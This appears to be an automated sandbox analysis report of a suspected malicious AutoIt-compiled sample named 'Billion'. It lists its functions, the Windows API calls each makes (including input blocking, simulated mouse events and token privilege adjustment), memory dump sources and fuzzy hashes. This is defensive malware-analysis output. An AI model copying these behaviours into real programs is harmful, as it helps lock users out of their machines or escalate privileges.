                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 891c2fb197bf4cb6f606c42220555901a1d62c88a59a6b0febe8eb1b2e314a98
                                                                                                                                                                                                                                                                                                          • Instruction ID: 86dc2f68dd8afaeedcde5c0f2bf5abace7eebb77f619f0145a2953fa30e5e259
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 891c2fb197bf4cb6f606c42220555901a1d62c88a59a6b0febe8eb1b2e314a98
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63E0B671000588EFCF216F54ED19E583F6AEB60386F154024FC599A961DB35DD96CAC0
                                                                                                                                                                                                                                                                                                          Function 0018E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 0018E664
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                                                                                                                                                          • String ID: X64
                                                                                                                                                                                                                                                                                                          • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                                                          • Opcode ID: b184e403530be8e0f59c1fa94475936ea99b859b5095da2fea10fefb5f07e8d6
                                                                                                                                                                                                                                                                                                          • Instruction ID: 87bf8d009db0f8aa81dccb616572ce9440f3bd9ca86332dcd703a7dddca9436a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b184e403530be8e0f59c1fa94475936ea99b859b5095da2fea10fefb5f07e8d6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7D0C9F480112DEACB84CB50EC88DD977BCBB04304F120665F106E2000D73096498F10
                                                                                                                                                                                                                                                                                                          Function 001A41FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,001B52EE,?,?,00000035,?), ref: 001A4229
                                                                                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,001B52EE,?,?,00000035,?), ref: 001A4239
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6f5b5bdf703ea622a4c9473fb60681856b30fac121b69ee5c552537fc63d6520
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4612bd2cb24363687d6e22fa8d5f284a168c29c808536b81f64e2ed94ca3cd58
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f5b5bdf703ea622a4c9473fb60681856b30fac121b69ee5c552537fc63d6520
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EF0E5756002246AE7201665AC4DFEB7A6DFFC5761F000176F509D2281DA70D940C6B0
                                                                                                                                                                                                                                                                                                          Function 00191A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00191B48), ref: 00191A20
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00191B48), ref: 00191A35
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 81990902-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c9d81d00a73570fe281f3fdbc708d8d39a9992b4b6670f32b79f7384394212bb
                                                                                                                                                                                                                                                                                                          • Instruction ID: 184cdbab5b9af4d8516b93b431a33abfe3e6dd64d571175d16cde0a634e1110f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9d81d00a73570fe281f3fdbc708d8d39a9992b4b6670f32b79f7384394212bb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAE01A72004A10AEE7262B50FC05E727BA9FB04351F14882DB8A584470DBA2AC91DA10
                                                                                                                                                                                                                                                                                                          Function 001AF4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • BlockInput.USER32(00000001), ref: 001AF51A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: BlockInput
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 10534a97afd2a076c1b00b68f97d9e1bb8597bef0beafd4ff5f39c698e32107a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 23b81463d3edb903e7fc2ddc4f77ed1b7a089678b9e2406d974ff5a711989f8b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10534a97afd2a076c1b00b68f97d9e1bb8597bef0beafd4ff5f39c698e32107a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6AE048762003149FD710AF69D405E56FBD8AFA5761F018429F849D7351D770F941CB94
                                                                                                                                                                                                                                                                                                          Function 0019EC6C Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0019EC95
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: mouse_event
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2434400541-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 18dde75b4aa928b57e935d09dcd350ad151feea4da71dc79753e614b498b2204
                                                                                                                                                                                                                                                                                                          • Instruction ID: fee709c89154719da76d7dc6bcec657521d98860861854c882271f81ee3ef324
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18dde75b4aa928b57e935d09dcd350ad151feea4da71dc79753e614b498b2204
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31D05EB61903007AEC1CCA3CDF2FF360A89E302761F804349F182D5595E7C199409123
                                                                                                                                                                                                                                                                                                          Function 00150D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0015075E), ref: 00150D4A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 95147e4ae1a6a320bf48740b686f754e8c28fa92e8734e511c1f2e63a38ef136
                                                                                                                                                                                                                                                                                                          • Instruction ID: e5e9d6fd7619dd92f2c18331743b8ff1f35cdc9dc34f17a1b7a1d83251d47fcc
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95147e4ae1a6a320bf48740b686f754e8c28fa92e8734e511c1f2e63a38ef136
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                          Function 001B353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001B358D
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001B35A0
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 001B35AF
                                                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 001B35CA
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 001B35D1
                                                                                                                                                                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 001B3700
                                                                                                                                                                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 001B370E
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B3755
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 001B3761
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 001B379D
                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B37BF
                                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B37D2
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B37DD
                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 001B37E6
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B37F5
                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 001B37FE
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B3805
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 001B3810
                                                                                                                                                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B3822
                                                                                                                                                                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,001D0C04,00000000), ref: 001B3838
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 001B3848
                                                                                                                                                                                                                                                                                                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 001B386E
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 001B388D
                                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B38AF
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B3A9C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                                          • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                                          • Opcode ID: c7a684e2030658e26ced2932eeac046721c829565f138d2c21635fcd442b5d0f
                                                                                                                                                                                                                                                                                                          • Instruction ID: a7e17ad9104147f21df0fe4d1b59364d0e18da7ad44abdb94d14c3678c2d9979
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7a684e2030658e26ced2932eeac046721c829565f138d2c21635fcd442b5d0f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB027C72900215EFDB14DF64DC89EAE7BB9FB48314F048168F915AB2A1CB74EE45CB60
                                                                                                                                                                                                                                                                                                          Function 00131625 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 480windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?,?), ref: 001316B4
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00172B07
                                                                                                                                                                                                                                                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00172B40
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00172F85
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00131488,?,00000000,?,?,?,?,0013145A,00000000,?), ref: 00131865
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001053), ref: 00172FC1
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00172FD8
                                                                                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00172FEE
                                                                                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00172FF9
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                                          • String ID: 0$( $( $(
                                                                                                                                                                                                                                                                                                          • API String ID: 2760611726-4072025856
                                                                                                                                                                                                                                                                                                          • Opcode ID: 70bedf3f36aa9ceb6a1ed8794b5f7bcccbcdd0c3ac10b072f270168e607dcead
                                                                                                                                                                                                                                                                                                          • Instruction ID: a38eb957c08d99f66947311dd67abe96619e71dc7b4d8d4244171459a75541d9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70bedf3f36aa9ceb6a1ed8794b5f7bcccbcdd0c3ac10b072f270168e607dcead
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1112BE70204241EFC729CF54D889BA9BBF5FB54300F288569F4999B662CB71EC87CB91
                                                                                                                                                                                                                                                                                                          Function 001C7B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 001C7B67
                                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 001C7B98
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 001C7BA4
                                                                                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 001C7BBE
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 001C7BCD
                                                                                                                                                                                                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 001C7BF8
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(00000010), ref: 001C7C00
                                                                                                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 001C7C07
                                                                                                                                                                                                                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 001C7C16
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001C7C1D
                                                                                                                                                                                                                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 001C7C68
                                                                                                                                                                                                                                                                                                          • FillRect.USER32(?,?,?), ref: 001C7C9A
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001C7CBC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: GetSysColor.USER32(00000012), ref: 001C7E5B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: SetTextColor.GDI32(?,001C7B2D), ref: 001C7E5F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: GetSysColorBrush.USER32(0000000F), ref: 001C7E75
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: GetSysColor.USER32(0000000F), ref: 001C7E80
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: GetSysColor.USER32(00000011), ref: 001C7E9D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 001C7EAB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: SelectObject.GDI32(?,00000000), ref: 001C7EBC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: SetBkColor.GDI32(?,?), ref: 001C7EC5
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: SelectObject.GDI32(?,?), ref: 001C7ED2
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 001C7EF1
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001C7F08
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: GetWindowLongW.USER32(?,000000F0), ref: 001C7F15
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 664c34b4c357b9f9ec924a9aa64303036b8f9f3036009f6ab7c64d075324e1be
                                                                                                                                                                                                                                                                                                          • Instruction ID: 85d1f3c150ae730cbc81cf612ee3173f3347dfb86772a1471f549c665d9041cb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 664c34b4c357b9f9ec924a9aa64303036b8f9f3036009f6ab7c64d075324e1be
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60A15B72008302AFDB119F64EC48F6BBBA9FB48325F144A2DF962965E0D771D984CF52
                                                                                                                                                                                                                                                                                                          Function 001B316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 001B319B
                                                                                                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001B32C7
                                                                                                                                                                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 001B3306
                                                                                                                                                                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 001B3316
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 001B335D
